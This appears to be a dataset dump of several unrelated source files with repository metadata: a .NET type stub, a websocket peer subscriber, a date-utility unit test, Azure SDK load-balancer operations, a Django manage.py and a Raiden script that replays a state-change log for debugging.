Get: Name(self: MemberDescriptor) -> str
"""
NameHashCode=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the hash code for the name of the member,as specified in System.String.GetHashCode.
"""
| 24.763158 | 126 | 0.705329 | class MemberDescriptor(object):
def CreateAttributeCollection(self,*args):
pass
def Equals(self,obj):
pass
def FillAttributes(self,*args):
pass
def FindMethod(self,*args):
pass
def GetHashCode(self):
pass
def GetInvocationTarget(self,*args):
pass
def GetInvokee(self,*args):
pass
def GetSite(self,*args):
pass
def __eq__(self,*args):
pass
@staticmethod
def __new__(self,*args):
pass
def __ne__(self,*args):
pass
AttributeArray=property(lambda self: object(),lambda self,v: None,lambda self: None)
Attributes=property(lambda self: object(),lambda self,v: None,lambda self: None)
Category=property(lambda self: object(),lambda self,v: None,lambda self: None)
Description=property(lambda self: object(),lambda self,v: None,lambda self: None)
DesignTimeOnly=property(lambda self: object(),lambda self,v: None,lambda self: None)
DisplayName=property(lambda self: object(),lambda self,v: None,lambda self: None)
IsBrowsable=property(lambda self: object(),lambda self,v: None,lambda self: None)
Name=property(lambda self: object(),lambda self,v: None,lambda self: None)
NameHashCode=property(lambda self: object(),lambda self,v: None,lambda self: None)
| true | true |
1c3c7dc962d6b6cba742e9ed1e8000ba84bde9d9 | 1,357 | py | Python | src/intergalactic/peer/subscriber.py | robmoorman/intergalactic | a4ac6a6def61139435d6694c363896efee9f117c | [
"Apache-2.0"
] | 1 | 2021-02-15T15:22:08.000Z | 2021-02-15T15:22:08.000Z | src/intergalactic/peer/subscriber.py | robmoorman/intergalactic | a4ac6a6def61139435d6694c363896efee9f117c | [
"Apache-2.0"
] | null | null | null | src/intergalactic/peer/subscriber.py | robmoorman/intergalactic | a4ac6a6def61139435d6694c363896efee9f117c | [
"Apache-2.0"
] | null | null | null | # Copyright 2018 Rob Moorman
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import websockets
from intergalactic import settings
from intergalactic.peer.handlers import message_handler
from intergalactic.peer.manager import manager
from intergalactic.types import MessageType
from intergalactic.utils import logging
logger = logging.get_logger(__name__)
async def subscribe_to_peer(url):
    """Dial the peer at *url* over websockets and enter its message loop.

    The connection is registered with the manager and serviced by
    ``init_peer_connection``, which does not return under normal operation.
    """
    ws = await websockets.connect(url)
    await init_peer_connection(ws, url=url)
async def init_peer_connection(ws, url=None, trigger_initial_message=True):
    """Register a websocket with the peer manager and pump its messages.

    :param ws: an open websocket connection to a peer.
    :param url: peer URL to record in the manager; ``None`` for connections
        whose address was not dialed by us (e.g. inbound peers).
    :param trigger_initial_message: when True, send an initial PING message
        before entering the receive loop.
    """
    if url is not None:
        manager.add_peer(url)
    manager.add_socket(ws)
    if trigger_initial_message:
        await ws.send(json.dumps({
            "type": MessageType.PING.value
        }))
    # Receive loop: runs until ws.recv() raises (presumably on connection
    # close), letting the exception propagate to the caller — TODO confirm.
    while True:
        msg = await ws.recv()
        await message_handler(ws, msg)
| 28.87234 | 75 | 0.745763 |
import json
import websockets
from intergalactic import settings
from intergalactic.peer.handlers import message_handler
from intergalactic.peer.manager import manager
from intergalactic.types import MessageType
from intergalactic.utils import logging
logger = logging.get_logger(__name__)
async def subscribe_to_peer(url):
ws = await websockets.connect(url)
await init_peer_connection(ws, url=url)
async def init_peer_connection(ws, url=None, trigger_initial_message=True):
if url is not None:
manager.add_peer(url)
manager.add_socket(ws)
if trigger_initial_message:
await ws.send(json.dumps({
"type": MessageType.PING.value
}))
while True:
msg = await ws.recv()
await message_handler(ws, msg)
| true | true |
1c3c7dd4209dc5d0e2e30918d7471e401c1e4c48 | 1,005 | py | Python | components/iscesys/DateTimeUtil/test/test_datetimeutil.py | vincentschut/isce2 | 1557a05b7b6a3e65abcfc32f89c982ccc9b65e3c | [
"ECL-2.0",
"Apache-2.0"
] | 1,133 | 2022-01-07T21:24:57.000Z | 2022-01-07T21:33:08.000Z | components/iscesys/DateTimeUtil/test/test_datetimeutil.py | vincentschut/isce2 | 1557a05b7b6a3e65abcfc32f89c982ccc9b65e3c | [
"ECL-2.0",
"Apache-2.0"
] | 276 | 2019-02-10T07:18:28.000Z | 2022-03-31T21:45:55.000Z | components/iscesys/DateTimeUtil/test/test_datetimeutil.py | vincentschut/isce2 | 1557a05b7b6a3e65abcfc32f89c982ccc9b65e3c | [
"ECL-2.0",
"Apache-2.0"
] | 235 | 2019-02-10T05:00:53.000Z | 2022-03-18T07:37:24.000Z | import datetime
import unittest
from iscesys.DateTimeUtil.DateTimeUtil import DateTimeUtil
class DateTimeUtilTest(unittest.TestCase):
    """Unit tests for the iscesys DateTimeUtil conversion helpers."""

    def setUp(self):
        # Two naive datetimes on 2004-03-15, 29 min 15 s apart.
        self.dt1 = datetime.datetime(year=2004, month=3, day=15, hour=12, minute=30, second=0)
        self.dt2 = datetime.datetime(year=2004, month=3, day=15, hour=12, minute=59, second=15)

    def tearDown(self):
        pass

    def testTimeDeltaToSeconds(self):
        """timeDeltaToSeconds() converts a timedelta to float seconds."""
        ans = 29 * 60.0 + 15
        td = self.dt2 - self.dt1
        numSeconds = DateTimeUtil.timeDeltaToSeconds(td)
        # assertAlmostEqual replaces the deprecated assertAlmostEquals alias.
        self.assertAlmostEqual(numSeconds, ans, 5)

    def testSecondsSinceMidnight(self):
        """secondsSinceMidnight() measures 12:30:00 as half a day + 30 min."""
        ans = 86400.0 / 2 + 30.0 * 60
        numSeconds = DateTimeUtil.secondsSinceMidnight(self.dt1)
        self.assertAlmostEqual(numSeconds, ans, 5)

    def testDateTimeToDecimalYear(self):
        """dateTimeToDecimalYear() maps 2004-03-15T12:30 to ~2004.2053388."""
        ans = 2004.2053388
        decimalYear = DateTimeUtil.dateTimeToDecimalYear(self.dt1)
        self.assertAlmostEqual(decimalYear, ans, 5)
if __name__ == "__main__":
unittest.main()
| 29.558824 | 90 | 0.700498 | import datetime
import unittest
from iscesys.DateTimeUtil.DateTimeUtil import DateTimeUtil
class DateTimeUtilTest(unittest.TestCase):
def setUp(self):
self.dt1 = datetime.datetime(year=2004,month=3,day=15,hour=12,minute=30,second=0)
self.dt2 = datetime.datetime(year=2004,month=3,day=15,hour=12,minute=59,second=15)
def tearDown(self):
pass
def testTimeDeltaToSeconds(self):
ans = 29*60.0+15
td = self.dt2-self.dt1
numSeconds = DateTimeUtil.timeDeltaToSeconds(td)
self.assertAlmostEquals(numSeconds,ans,5)
def testSecondsSinceMidnight(self):
ans = 86400.0/2 + 30.0*60
numSeconds = DateTimeUtil.secondsSinceMidnight(self.dt1)
self.assertAlmostEquals(numSeconds,ans,5)
def testDateTimeToDecimalYear(self):
ans = 2004.2053388
decimalYear = DateTimeUtil.dateTimeToDecimalYear(self.dt1)
self.assertAlmostEquals(decimalYear,ans,5)
if __name__ == "__main__":
unittest.main()
| true | true |
1c3c7e621677eba074969705f82fa8e2ede0d5b9 | 8,757 | py | Python | sdk/network/azure-mgmt-network/azure/mgmt/network/v2017_09_01/operations/_load_balancer_frontend_ip_configurations_operations.py | LianwMS/azure-sdk-for-python | 612d7bca9de86ee1bd1fa59291d7bf897ba9213f | [
"MIT"
] | 2 | 2019-05-17T21:24:53.000Z | 2020-02-12T11:13:42.000Z | sdk/network/azure-mgmt-network/azure/mgmt/network/v2017_09_01/operations/_load_balancer_frontend_ip_configurations_operations.py | LianwMS/azure-sdk-for-python | 612d7bca9de86ee1bd1fa59291d7bf897ba9213f | [
"MIT"
] | 15 | 2019-07-12T18:18:04.000Z | 2019-07-25T20:55:51.000Z | sdk/network/azure-mgmt-network/azure/mgmt/network/v2017_09_01/operations/_load_balancer_frontend_ip_configurations_operations.py | LianwMS/azure-sdk-for-python | 612d7bca9de86ee1bd1fa59291d7bf897ba9213f | [
"MIT"
] | 2 | 2020-05-21T22:51:22.000Z | 2020-05-26T20:53:01.000Z | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class LoadBalancerFrontendIPConfigurationsOperations(object):
    """LoadBalancerFrontendIPConfigurationsOperations operations.
    You should not instantiate this class directly. Instead, you should create a Client instance that
    instantiates it for you and attaches it as an attribute.
    :ivar models: Alias to model classes used in this operation group.
    :type models: ~azure.mgmt.network.v2017_09_01.models
    :param client: Client for service requests.
    :param config: Configuration of service client.
    :param serializer: An object model serializer.
    :param deserializer: An object model deserializer.
    """
    models = models
    def __init__(self, client, config, serializer, deserializer):
        self._client = client
        self._serialize = serializer
        self._deserialize = deserializer
        self._config = config
    def list(
        self,
        resource_group_name,  # type: str
        load_balancer_name,  # type: str
        **kwargs  # type: Any
    ):
        # type: (...) -> Iterable["models.LoadBalancerFrontendIPConfigurationListResult"]
        """Gets all the load balancer frontend IP configurations.
        :param resource_group_name: The name of the resource group.
        :type resource_group_name: str
        :param load_balancer_name: The name of the load balancer.
        :type load_balancer_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator like instance of either LoadBalancerFrontendIPConfigurationListResult or the result of cls(response)
        :rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2017_09_01.models.LoadBalancerFrontendIPConfigurationListResult]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["models.LoadBalancerFrontendIPConfigurationListResult"]
        error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2017-09-01"
        def prepare_request(next_link=None):
            # First page: render the operation URL and attach api-version.
            # Subsequent pages: the service-supplied next_link is used as-is.
            if not next_link:
                # Construct URL
                url = self.list.metadata['url']  # type: ignore
                path_format_arguments = {
                    'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
                    'loadBalancerName': self._serialize.url("load_balancer_name", load_balancer_name, 'str'),
                    'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
                }
                url = self._client.format_url(url, **path_format_arguments)
                # Construct parameters
                query_parameters = {}  # type: Dict[str, Any]
                query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
            else:
                url = next_link
                query_parameters = {}  # type: Dict[str, Any]
            # Construct headers
            header_parameters = {}  # type: Dict[str, Any]
            header_parameters['Accept'] = 'application/json'
            # Construct and send request
            request = self._client.get(url, query_parameters, header_parameters)
            return request
        def extract_data(pipeline_response):
            # Deserialize one page into (continuation token, iterator of items).
            deserialized = self._deserialize('LoadBalancerFrontendIPConfigurationListResult', pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)
            return deserialized.next_link or None, iter(list_of_elem)
        def get_next(next_link=None):
            # Run one page request through the pipeline; raise on non-200.
            request = prepare_request(next_link)
            pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
            response = pipeline_response.http_response
            if response.status_code not in [200]:
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                raise HttpResponseError(response=response, error_format=ARMErrorFormat)
            return pipeline_response
        # ItemPaged lazily drives get_next/extract_data as the caller iterates.
        return ItemPaged(
            get_next, extract_data
        )
    list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/loadBalancers/{loadBalancerName}/frontendIPConfigurations'}  # type: ignore
    def get(
        self,
        resource_group_name,  # type: str
        load_balancer_name,  # type: str
        frontend_ip_configuration_name,  # type: str
        **kwargs  # type: Any
    ):
        # type: (...) -> "models.FrontendIPConfiguration"
        """Gets load balancer frontend IP configuration.
        :param resource_group_name: The name of the resource group.
        :type resource_group_name: str
        :param load_balancer_name: The name of the load balancer.
        :type load_balancer_name: str
        :param frontend_ip_configuration_name: The name of the frontend IP configuration.
        :type frontend_ip_configuration_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: FrontendIPConfiguration, or the result of cls(response)
        :rtype: ~azure.mgmt.network.v2017_09_01.models.FrontendIPConfiguration
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["models.FrontendIPConfiguration"]
        error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2017-09-01"
        # Construct URL
        url = self.get.metadata['url']  # type: ignore
        path_format_arguments = {
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'loadBalancerName': self._serialize.url("load_balancer_name", load_balancer_name, 'str'),
            'frontendIPConfigurationName': self._serialize.url("frontend_ip_configuration_name", frontend_ip_configuration_name, 'str'),
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)
        # Construct parameters
        query_parameters = {}  # type: Dict[str, Any]
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Accept'] = 'application/json'
        # Construct and send request
        request = self._client.get(url, query_parameters, header_parameters)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        # Only 200 is a documented success for this operation.
        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        deserialized = self._deserialize('FrontendIPConfiguration', pipeline_response)
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized
    get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/loadBalancers/{loadBalancerName}/frontendIPConfigurations/{frontendIPConfigurationName}'}  # type: ignore
| 48.65 | 228 | 0.676716 |
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models
if TYPE_CHECKING:
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class LoadBalancerFrontendIPConfigurationsOperations(object):
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list(
self,
resource_group_name,
load_balancer_name,
**kwargs
):
cls = kwargs.pop('cls', None)
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2017-09-01"
def prepare_request(next_link=None):
if not next_link:
url = self.list.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'loadBalancerName': self._serialize.url("load_balancer_name", load_balancer_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
else:
url = next_link
query_parameters = {}
header_parameters = {}
header_parameters['Accept'] = 'application/json'
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('LoadBalancerFrontendIPConfigurationListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/loadBalancers/{loadBalancerName}/frontendIPConfigurations'}
    def get(
        self,
        resource_group_name,
        load_balancer_name,
        frontend_ip_configuration_name,
        **kwargs
    ):
        """Get one frontend IP configuration of a load balancer.

        :param resource_group_name: Name of the resource group.
        :param load_balancer_name: Name of the load balancer.
        :param frontend_ip_configuration_name: Name of the frontend IP
            configuration to fetch.
        :keyword cls: Optional callable applied to the deserialized result.
        :raises HttpResponseError: On any non-200 service response.
        :return: The deserialized 'FrontendIPConfiguration' model (or the
            value produced by ``cls``).
        """
        cls = kwargs.pop('cls', None)
        # Map well-known HTTP status codes to typed exceptions; callers may
        # extend/override the mapping via the ``error_map`` keyword.
        error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2017-09-01"
        # Expand the URL template from ``get.metadata`` with escaped values.
        url = self.get.metadata['url']
        path_format_arguments = {
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'loadBalancerName': self._serialize.url("load_balancer_name", load_balancer_name, 'str'),
            'frontendIPConfigurationName': self._serialize.url("frontend_ip_configuration_name", frontend_ip_configuration_name, 'str'),
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
        header_parameters = {}
        header_parameters['Accept'] = 'application/json'
        request = self._client.get(url, query_parameters, header_parameters)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        deserialized = self._deserialize('FrontendIPConfiguration', pipeline_response)
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized
    get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/loadBalancers/{loadBalancerName}/frontendIPConfigurations/{frontendIPConfigurationName}'}
| true | true |
1c3c7ec61534821e17a751ca0f96fbb881982387 | 631 | py | Python | backend/manage.py | crowdbotics-apps/dookh-28435 | 61989e90fda5d3b05e98748f15d42e7c852d07ba | [
"FTL",
"AML",
"RSA-MD"
] | null | null | null | backend/manage.py | crowdbotics-apps/dookh-28435 | 61989e90fda5d3b05e98748f15d42e7c852d07ba | [
"FTL",
"AML",
"RSA-MD"
] | null | null | null | backend/manage.py | crowdbotics-apps/dookh-28435 | 61989e90fda5d3b05e98748f15d42e7c852d07ba | [
"FTL",
"AML",
"RSA-MD"
] | null | null | null | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
    """Entry point: select the settings module and hand over to Django's CLI."""
    os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'dookh_28435.settings')
    try:
        from django.core.management import execute_from_command_line
    except ImportError as import_error:
        # Re-raise with a hint about the most common causes, keeping the
        # original ImportError chained as the cause.
        message = (
            "Couldn't import Django. Are you sure it's installed and "
            "available on your PYTHONPATH environment variable? Did you "
            "forget to activate a virtual environment?"
        )
        raise ImportError(message) from import_error
    execute_from_command_line(sys.argv)


if __name__ == '__main__':
    main()
| 28.681818 | 75 | 0.684628 |
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'dookh_28435.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| true | true |
1c3c7f0543309cbb6edf91512c6c20ad1c6ee911 | 11,079 | py | Python | tools/debugging/replay_wal.py | JamieSlome/raiden | ccd11e59c1259fdd661b31df706e511dd6e6bc9f | [
"MIT"
] | null | null | null | tools/debugging/replay_wal.py | JamieSlome/raiden | ccd11e59c1259fdd661b31df706e511dd6e6bc9f | [
"MIT"
] | null | null | null | tools/debugging/replay_wal.py | JamieSlome/raiden | ccd11e59c1259fdd661b31df706e511dd6e6bc9f | [
"MIT"
] | null | null | null | #!/usr/bin/env python
"""
This script is meant to be used as a template to step through a provided DB file
for debugging a specific issue.
It constructs the chain_state through the _state_manager and uses the WAL
to replay all state changes through the state machines until all state changes are consumed.
The parameters (token_network_address and partner_address) will help filter out all
state changes until a channel is found with the provided token network address and partner.
The ignored state changes will still be applied, but they will just not be printed out.
"""
import json
import re
import shutil
from contextlib import closing
from pathlib import Path
from typing import NoReturn, TextIO
import click
from eth_utils import encode_hex, is_address, to_canonical_address, to_checksum_address
from raiden.storage.serialization import JSONSerializer
from raiden.storage.sqlite import (
LOW_STATECHANGE_ULID,
RANGE_ALL_STATE_CHANGES,
SerializedSQLiteStorage,
)
from raiden.storage.wal import WriteAheadLog, dispatch
from raiden.transfer import channel, node, views
from raiden.transfer.architecture import Event, StateChange
from raiden.transfer.state import NetworkState
from raiden.utils.formatting import pex
from raiden.utils.typing import (
Address,
Any,
Balance,
ChannelID,
Dict,
Iterable,
List,
Nonce,
Optional,
SecretHash,
TokenNetworkAddress,
Tuple,
)
class Translator(dict):
    """Dictionary class with re substitution capabilities.

    Keys are looked up case-insensitively; address-like keys additionally
    match their ``pex`` short form and their '0x'-less hex spelling.  The
    mapping is frozen after construction, because the substitution regex is
    compiled exactly once in ``__init__``.
    """

    def __init__(self, *args: Any, **kwargs: Any) -> None:
        # Normalize all keys to lowercase so lookups are case-insensitive.
        kwargs = {k.lower(): v for k, v in args[0].items()}
        super().__init__(kwargs)
        self._extra_keys: Dict[str, str] = dict()
        self._regex: Optional[re.Pattern[str]] = None
        self._make_regex()

    def _address_rxp(self, addr: str) -> str:
        """Create a regex string for addresses, that matches several representations:
        - with(out) '0x' prefix
        - `pex` version

        This function takes care of maintaining additional lookup keys for substring matches.
        In case the given string is no address, it returns the original string.
        """
        try:
            addr = str(to_checksum_address(addr))
            rxp = "(?:0x)?" + pex(to_canonical_address(addr)) + f"(?:{addr.lower()[10:]})?"
            # Record the alternative spellings so __getitem__ can resolve a
            # regex match back to the canonical (lowercase) key.
            self._extra_keys[pex(to_canonical_address(addr))] = addr.lower()
            self._extra_keys[addr[2:].lower()] = addr.lower()
        except ValueError:
            # Not an address at all: match the key text verbatim.
            rxp = addr
        return rxp

    def _make_regex(self) -> None:
        """Compile rxp with all keys concatenated."""
        rxp = "|".join(map(self._address_rxp, self.keys()))
        self._regex = re.compile(rxp, re.IGNORECASE)

    def __setitem__(self, key: str, value: Any) -> NoReturn:
        raise NotImplementedError(f"{self.__class__} must not dynamically modified")

    def pop(self, key: str, *args: Any) -> NoReturn:
        # BUG FIX: this was previously named ``__pop__``, which is not a
        # special method Python ever invokes -- ``dict.pop`` remained fully
        # usable and could mutate the instance behind the compiled regex's
        # back.  Overriding ``pop`` itself enforces the intended immutability.
        raise NotImplementedError(f"{self.__class__} must not dynamically modified")

    def __getitem__(self, key: str) -> Any:
        try:
            return dict.__getitem__(self, key)
        except KeyError as e:
            # Fall back to the alternative spellings recorded for addresses;
            # re-raise the original KeyError if that fails too.
            alt = self._extra_keys.get(key)
            try:
                return dict.__getitem__(self, alt)
            except KeyError:
                raise e

    def __call__(self, match: re.Match) -> str:
        """Lookup for each rxp match."""
        return "[{}]".format(self[match.group(0).lower()])

    def translate(self, text: str) -> str:
        """Translate text."""
        assert self._regex is not None, "regex not set"
        return self._regex.sub(self, text)
def state_change_contains_secrethash(obj: Any, secrethash: SecretHash) -> bool:
    """Tell whether *obj* (a state change) refers to *secrethash*, either
    directly, via its ``transfer`` attribute, or via the transfer's lock.
    """
    sentinel = object()
    if getattr(obj, "secrethash", sentinel) == secrethash:
        return True
    transfer = getattr(obj, "transfer", None)
    if transfer is None:
        return False
    if getattr(transfer, "secrethash", sentinel) == secrethash:
        return True
    lock = getattr(transfer, "lock", None)
    return lock is not None and lock.secrethash == secrethash
def state_change_with_nonce(
    obj: Any, nonce: Nonce, channel_identifier: ChannelID, sender: Address
) -> bool:
    """Tell whether *obj* carries a balance proof matching *nonce*,
    *channel_identifier* and *sender* (compared in canonical form).
    """
    if not hasattr(obj, "balance_proof"):
        return False
    balance_proof = obj.balance_proof
    return (
        balance_proof.nonce == nonce
        and balance_proof.channel_identifier == channel_identifier
        and balance_proof.sender == to_canonical_address(sender)
    )
def print_attributes(data: Dict, translator: Optional[Translator] = None) -> None:
    """Pretty-print ``key=value`` pairs, one indented line per attribute.

    ``bytes`` values are hex-encoded; the rendered value is passed through
    *translator* (when given) to substitute addresses with readable names.
    """
    for key, value in data.items():
        if isinstance(value, bytes):
            value = encode_hex(value)
        rendered = repr(value)
        if translator is not None:
            rendered = translator.translate(rendered)
        click.echo("\t", nl=False)
        click.echo(click.style(key, fg="blue"), nl=False)
        click.echo(click.style("="), nl=False)
        click.echo(click.style(rendered, fg="yellow"))
def print_state_change(state_change: StateChange, translator: Optional[Translator] = None) -> None:
    """Print the state change's class name (red, bold) and its attributes."""
    header = f"> {state_change.__class__.__name__}"
    click.echo(click.style(header, fg="red", bold=True))
    print_attributes(state_change.__dict__, translator=translator)
def print_events(events: Iterable[Event], translator: Optional[Translator] = None) -> None:
    """Print each raised event: class name (green, bold) plus attributes."""
    for event in events:
        header = f"< {event.__class__.__name__}"
        click.echo(click.style(header, fg="green", bold=True))
        print_attributes(event.__dict__, translator=translator)
def print_presence_view(chain_state: Any, translator: Optional[Translator] = None) -> None:
    """Print one color-coded presence entry per known node address.

    Green = reachable, red = unreachable, white = unknown; any other
    network state falls back to the default terminal color.
    """
    state_colors = {
        NetworkState.REACHABLE: "green",
        NetworkState.UNREACHABLE: "red",
        NetworkState.UNKNOWN: "white",
    }
    click.secho("Presence:", nl=False, fg="white")
    for address, network_state in chain_state.nodeaddresses_to_networkstates.items():
        label = pex(address)
        if translator is not None:
            label = translator.translate(label)
        # ``dict.get`` yields None for unmapped states, i.e. default color.
        click.secho(f" {label}", fg=state_colors.get(network_state), nl=False)
    click.echo("", nl=True)
def get_node_balances(
    chain_state: Any, token_network_address: TokenNetworkAddress
) -> List[Tuple[Address, Balance, Balance]]:
    """Collect ``(partner_address, our_balance, partner_balance)`` for every
    channel of *chain_state* that belongs to *token_network_address*.
    """
    wanted_network = to_canonical_address(token_network_address)
    balances = []
    for channel_state in views.list_all_channelstate(chain_state):
        if channel_state.canonical_identifier.token_network_address != wanted_network:  # type: ignore
            continue
        our_state = channel_state.our_state
        partner_state = channel_state.partner_state
        balances.append(
            (
                partner_state.address,
                channel.get_balance(our_state, partner_state),
                channel.get_balance(partner_state, our_state),
            )
        )
    return balances
def print_node_balances(
    chain_state: Any,
    token_network_address: TokenNetworkAddress,
    translator: Optional[Translator] = None,
) -> None:
    """Print per-partner channel balances and our total for one network."""
    balances = get_node_balances(chain_state, token_network_address)
    total = 0
    for partner, our_balance, partner_balance in balances:
        label = pex(partner)
        if translator is not None:
            label = translator.translate(label)
        click.secho(f"{label} ->{our_balance} <-{partner_balance}", fg="blue")
        total += our_balance
    our_label = pex(chain_state.our_address)
    if translator is not None:
        our_label = translator.translate(our_label)
    click.secho(f"Sum {our_label}: {total}")
def print_nl() -> None:
    """Print a horizontal separator line spanning the terminal width."""
    # ``click.get_terminal_size`` was deprecated in click 8.0 and removed in
    # click 8.1; ``shutil.get_terminal_size`` is the stdlib replacement and
    # returns an ``os.terminal_size`` whose ``columns`` field is the width.
    click.echo("-" * shutil.get_terminal_size().columns, nl=True)
def replay_wal(
    storage: SerializedSQLiteStorage,
    token_network_address: TokenNetworkAddress,
    partner_address: Address,
    translator: Optional[Translator] = None,
) -> None:
    """Replay every state change in *storage* through the state machine.

    Starting from the snapshot taken before the first state change, each
    state change is dispatched one at a time.  Once a channel with
    *token_network_address*/*partner_address* exists in the resulting chain
    state, every subsequent state change and the events it produced are
    printed (optionally name-translated via *translator*).
    """
    snapshot = storage.get_snapshot_before_state_change(
        state_change_identifier=LOW_STATECHANGE_ULID
    )
    assert snapshot is not None, "No snapshot found"
    wal = WriteAheadLog(snapshot.data, storage, node.state_transition)  # type: ignore
    state = wal.get_current_state()
    all_state_changes = storage.get_statechanges_by_range(RANGE_ALL_STATE_CHANGES)
    for state_change in all_state_changes:
        # Dispatching the state changes one-by-one to ease debugging
        state, events = dispatch(
            state=state,
            state_change=state_change,
            state_transition=wal.state_transition,
        )
        msg = "Chain state must never be cleared up."
        assert state, msg
        channel_state = views.get_channelstate_by_token_network_and_partner(
            state,  # type: ignore
            to_canonical_address(token_network_address),  # type: ignore
            to_canonical_address(partner_address),
        )
        # Stay quiet (but keep applying state changes) until the channel of
        # interest appears in the chain state.
        if channel_state is None:
            continue
        ###
        # Customize this to filter things further somewhere around here.
        # An example would be to add `breakpoint()`
        # and inspect the state.
        ###
        print_state_change(state_change, translator=translator)
        print_events(events, translator=translator)
